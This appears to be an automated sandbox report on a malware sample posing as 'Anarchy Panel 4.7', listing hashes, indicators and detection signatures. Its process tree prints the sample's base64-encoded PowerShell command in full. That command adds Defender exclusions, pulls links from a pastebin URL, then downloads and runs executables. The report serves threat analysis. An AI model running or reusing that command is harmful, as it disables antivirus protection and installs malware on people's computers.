Overview
overview
10Static
static
10Anarchy Pa...el.exe
windows7-x64
10Anarchy Pa...el.exe
windows10-2004-x64
10Anarchy Pa...xe.xml
windows7-x64
1Anarchy Pa...xe.xml
windows10-2004-x64
3Anarchy Pa...oG.dll
windows7-x64
1Anarchy Pa...oG.dll
windows10-2004-x64
1Anarchy Pa...uJ.dll
windows7-x64
1Anarchy Pa...uJ.dll
windows10-2004-x64
1Anarchy Pa...qM.dll
windows7-x64
1Anarchy Pa...qM.dll
windows10-2004-x64
1Anarchy Pa...LC.dll
windows7-x64
1Anarchy Pa...LC.dll
windows10-2004-x64
5Anarchy Pa...wp.dll
windows7-x64
1Anarchy Pa...wp.dll
windows10-2004-x64
1Anarchy Pa...uZ.dll
windows7-x64
1Anarchy Pa...uZ.dll
windows10-2004-x64
1Anarchy Pa...nG.dll
windows7-x64
1Anarchy Pa...nG.dll
windows10-2004-x64
1Anarchy Pa...TS.dll
windows7-x64
1Anarchy Pa...TS.dll
windows10-2004-x64
1Anarchy Pa...xj.dll
windows7-x64
1Anarchy Pa...xj.dll
windows10-2004-x64
1Anarchy Pa...pi.dll
windows7-x64
1Anarchy Pa...pi.dll
windows10-2004-x64
1Anarchy Pa...s4.dll
windows7-x64
1Anarchy Pa...s4.dll
windows10-2004-x64
1Anarchy Pa...Ya.dll
windows7-x64
1Anarchy Pa...Ya.dll
windows10-2004-x64
1Anarchy Pa...Jn.dll
windows7-x64
1Anarchy Pa...Jn.dll
windows10-2004-x64
1Anarchy Pa...GA.dll
windows7-x64
1Anarchy Pa...GA.dll
windows10-2004-x64
1Analysis
-
max time kernel
1566s -
max time network
1569s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
19-07-2023 00:36
Behavioral task
behavioral1
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win10v2004-20230703-en
Behavioral task
behavioral3
Sample
Anarchy Panel 4.7/Anarchy Panel.exe.xml
Resource
win7-20230712-en
Behavioral task
behavioral4
Sample
Anarchy Panel 4.7/Anarchy Panel.exe.xml
Resource
win10v2004-20230703-en
Behavioral task
behavioral5
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win7-20230712-en
Behavioral task
behavioral6
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral7
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win7-20230712-en
Behavioral task
behavioral8
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral9
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win7-20230712-en
Behavioral task
behavioral10
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral11
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win7-20230712-en
Behavioral task
behavioral12
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral13
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win7-20230712-en
Behavioral task
behavioral14
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral15
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win7-20230712-en
Behavioral task
behavioral16
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral17
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win7-20230712-en
Behavioral task
behavioral18
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral19
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win7-20230712-en
Behavioral task
behavioral20
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral21
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win7-20230712-en
Behavioral task
behavioral22
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral23
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win7-20230712-en
Behavioral task
behavioral24
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral25
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win7-20230712-en
Behavioral task
behavioral26
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral27
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win7-20230712-en
Behavioral task
behavioral28
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral29
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win7-20230712-en
Behavioral task
behavioral30
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win10v2004-20230703-en
Behavioral task
behavioral31
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win7-20230712-en
Behavioral task
behavioral32
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win10v2004-20230703-en
General
-
Target
Anarchy Panel 4.7/Anarchy Panel.exe
-
Size
72KB
-
MD5
462b459a2560b65a657cfecce53d682a
-
SHA1
f0ce24faf42d2d1453c4f18fda0223b83486e5ae
-
SHA256
00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db
-
SHA512
5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b
-
SSDEEP
384:5LerIjR+/cuFQ5r4NVX+oH38/1qmrc42mMPR45YHU/0/8IpzXePdCjiCNxKerWiV:nsUuFf
Malware Config
Extracted
https://pastebin.com/raw/p2s7tDSd
Signatures
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 3 1936 powershell.exe 5 1936 powershell.exe 6 1936 powershell.exe 7 1936 powershell.exe 8 1936 powershell.exe 9 1936 powershell.exe 10 1936 powershell.exe 11 1936 powershell.exe 12 1936 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1936 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1936 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
Anarchy Panel.exedescription pid process target process PID 1580 wrote to memory of 1936 1580 Anarchy Panel.exe powershell.exe PID 1580 wrote to memory of 1936 1580 Anarchy Panel.exe powershell.exe PID 1580 wrote to memory of 1936 1580 Anarchy Panel.exe powershell.exe PID 1580 wrote to memory of 1936 1580 Anarchy Panel.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2192